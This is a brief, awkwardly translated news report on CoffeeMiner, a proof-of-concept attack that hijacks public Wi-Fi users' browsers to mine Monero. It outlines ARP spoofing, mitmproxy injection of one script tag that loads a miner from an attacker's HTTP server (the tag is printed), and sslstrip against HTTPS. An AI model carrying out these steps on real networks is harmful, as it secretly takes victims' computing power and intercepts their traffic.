According to foreign media reported on January 8, Arnau developers released a proof of concept project called CoffeeMiner, showing how attackers use public Wi-Fi networks to tap encryption currency.
Encrypted currency prices have been favored by cyber attacks. Inspired by the Starbucks case, Arnau experts cracked public Wi-Fi networks, injected cryptographic mining code into connected browsing sessions, and forced all devices connected to a public Wi-Fi network to secretly tap cryptocurrencies.
Arnau explains how to inject some javascript for MITM attacks in the html page accessed by the connected user so that all devices connected to the WiFi network can be forced into Arnau’s crypto currency.
Arnau Experts Share CoffeeMiner Attacks:
Block the unencrypted transmission of other devices on the network by spoofing Address Resolution Protocol (ARP) messages on the LAN.
Use Mitmproxy to inject JavaScript into the pages visited by Wi-Fi users. In order to ensure the process is simple, the developer only injected a line of code to invoke the cryptocurrency miner.
<script src=”http://httpserverIP:8000/script.js” type=”text/javascript”></script>
Then, serve the miner through an HTTP server. Run JavaScript to abuse CPU time when a user’s browser loads a page with injected code, and mine Monero with CoinHive encryption mining software.
Once compiled, these elements become a single script that can be deployed by an attacker on a public Wi-Fi network. Unknowing users are rerouted through an attacker-controlled server, causing their device to tap cryptocurrencies for browsing.
The current version of CoffeeMiner released by researchers does not yet support HTTPS, but the restrictions can be bypassed by adding a sslstrip.
